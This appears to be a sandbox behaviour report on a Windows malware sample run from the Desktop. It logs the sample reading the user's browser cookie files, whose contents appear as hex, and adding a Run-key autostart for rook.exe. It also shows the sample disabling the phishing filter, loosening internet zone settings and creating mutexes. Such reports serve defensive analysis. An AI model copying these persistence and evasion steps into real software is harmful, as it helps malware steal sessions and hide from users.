C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 30 34 38 36 32 32 30 38 0A 33 30 31 39 32 33 32 37 0A 32 36 31 35 30 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt none 83 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt none 584 64 69 73 71 75 73 5F 75 6E 69 71 75 65 0A 39 37 38 37 38 38 39 36 33 38 38 30 0A 64 69 73 71 75 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 36 33 36 33 36 37 34 38 38 0A 33 30 32 36 35 31 34 37 0A 36 31 35 30 35 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 5F 5F 75 74 6D 61 0A 34 30 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt none 96 61 69 64 0A 43 33 66 64 61 36 36 35 63 31 31 31 31 30 37 31 38 34 37 36 37 36 33 32 35 35 36 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 37 30 34 36 36 33 31 36 38 0A 33 30 32 36 34 39 34 32 0A 32 34 35 30 32 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt none 88 61 69 64 0A 43 30 66 63 31 36 34 36 63 31 31 31 31 30 32 31 36 31 32 38 36 38 31 36 35 32 34 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 34 34 39 39 30 32 30 38 0A 33 30 32 36 34 39 35 32 0A 34 37 31 37 38 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt none 223 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 30 30 32 32 31 33 66 64 34 38 37 62 33 34 64 34 31 38 37 66 65 61 32 31 66 61 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt none 137 65 78 70 72 63 0A 69 64 3D 32 33 30 36 39 62 63 36 65 36 32 31 34 61 30 32 61 33 64 64 36 30 32 65 34 35 36 66 36 36 36 39 26 62 64 3D 32 30 31 31 2D 31 32 2D 30 31 54 32 30 3A 31 37 3A 33 38 2E 38 34 39 26 76 3D 32 0A 65 78 70 2E 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 32 35 32 38 38 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt none 88 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt none 99 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt none 100 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt none 455 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt none 387 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt none 521 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 32 31 34 64 38 30 63 64 33 30 33 38 34 36 65 37 38 30 32 61 63 34 62 34 63 62 33 65 37 31 32 64 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 38 34 37 30 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt none 353 5F 5F 75 74 6D 61 0A 31 35 36 32 31 31 39 34 30 2E 31 31 32 32 33 35 34 36 33 34 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 0A 6F 6C 64 61 70 70 73 2E 63 6F 6D 2F 0A 31 36 30 30 0A 38 30 37 36 39 31 33 39 32 0A 33 30 33 33 38 35 37 33 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt none 98 6D 63 0A 34 65 64 37 65 63 30 38 2D 39 39 31 31 62 2D 34 37 35 33 38 2D 61 33 39 37 39 0A 71 75 61 6E 74 73 65 72 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 39 39 38 34 32 38 31 36 0A 33 30 35 35 39 32 35 34 0A 36 38 34 35 38 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt none 160 6C 69 6E 6B 6A 75 6D 70 74 65 73 74 0A 31 0A 71 75 65 73 74 69 6F 6E 6D 61 72 6B 65 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 30 36 30 35 33 34 31 34 34 0A 33 30 31 39 31 37 33 36 0A 34 37 30 36 31 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 4C 50 0A 31 33 32 32 37 37 34 37 38 30 0A 71 75 65 73 74 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt none 115 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt none 113 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt none 205 55 49 44 0A 39 35 64 64 64 30 65 2D 36 39 2E 32 32 2E 31 33 38 2E 31 33 39 2D 31 33 32 32 37 37 33 32 36 34 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 36 38 31 39 35 36 33 35 32 0A 33 30 33 33 36 35 36 33 0A 32 35 30 35 36 34 33 35 38 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt none 96 70 69 64 0A 76 31 25 33 41 31 33 32 32 37 37 32 31 33 31 39 31 39 32 36 31 38 33 32 34 34 30 0A 74 77 69 74 74 65 72 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 35 35 38 36 33 36 38 30 0A 33 30 33 33 38 36 37 30 0A 33 30 31 34 32 33 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt none 90 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt none 111 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt none 117 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt none 229 65 78 70 61 63 0A 33 36 30 49 49 33 62 33 39 5F 31 31 30 32 3A 54 31 7E 34 30 49 49 33 61 33 39 5F 30 38 30 33 3A 57 50 31 30 5F 32 7C 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 32 30 34 36 36 35 39 38 34 0A 33 30 31 39 32 33 32 31 0A 32 31 32 32 33 32 37 33 36 30 0A 33 30 31 39 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt none 211 63 62 63 0A 53 57 50 32 32 3A 62 61 6E 3A 31 33 32 35 33 36 34 2C 73 75 62 69 6E 74 3A 31 3A 31 33 32 32 38 35 38 34 38 2C 64 69 73 70 63 6F 75 6E 74 3A 31 3A 31 33 32 33 31 31 37 36 38 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 32 32 35 32 36 35 38 36 38 38 0A 33 30 33 33 38 35 37 32 success or wait 1 1491C56
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi PositionInformation Offset: 0 success or wait 5 1491CD5
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary success or wait 1 1491D43
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
\KnownDlls\rsaenh.dll write and read and execute unknown 2B00000 208896 own pid readonly object name not found 1
C:\WINDOWS\system32\rsaenh.dll query and write and read and execute image 68000000 221184 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B00000 208896 own pid readonly success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\hnetcfg.dll write and read and execute commit 2900000 344064 own pid execute success or wait 1
C:\WINDOWS\system32\hnetcfg.dll write and read and execute commit 2900000 344064 own pid execute success or wait 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2940000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2940000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit F40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit F40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 2940000 258048 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and read commit 2940000 258048 own pid readonly success or wait 1
unknown query and write and read commit F40000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 28C0000 159744 own pid execute success or wait 1
unknown query and write and read commit F40000 16384 own pid read write success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
unknown query and write and read commit F40000 4096 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy CleanCookies Dword 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run {1C9B46F7-F88B-AD7E-FB56-FD56EA1DDE44} String "C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe" success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036859 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2feg2i1d String zohWpch3LqGxszKm success or wait 1 1485F0A
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 Dword 1 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406 Dword 3 0 success or wait 1 1485F0A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 Dword 1 0 success or wait 1 1485F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 1485EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609 success or wait 1 1485EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 18457c7d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 success or wait 1 1485F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 18457c7d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2af72gde object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 2f6gb30c object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run 2feg2i1d object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run 186gef90 object name not found 1 1485F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run ghhe0d4 object name not found 1 1485F47
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{41836DC6-D3BA-F066-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{97855BF5-E589-2660-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{9B698CC0-32BC-2A8C-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{9B698CC7-32BB-2A8C-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2 149A811
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} success or wait 1 149A811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 1 14A0DFC
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 3 149A78C
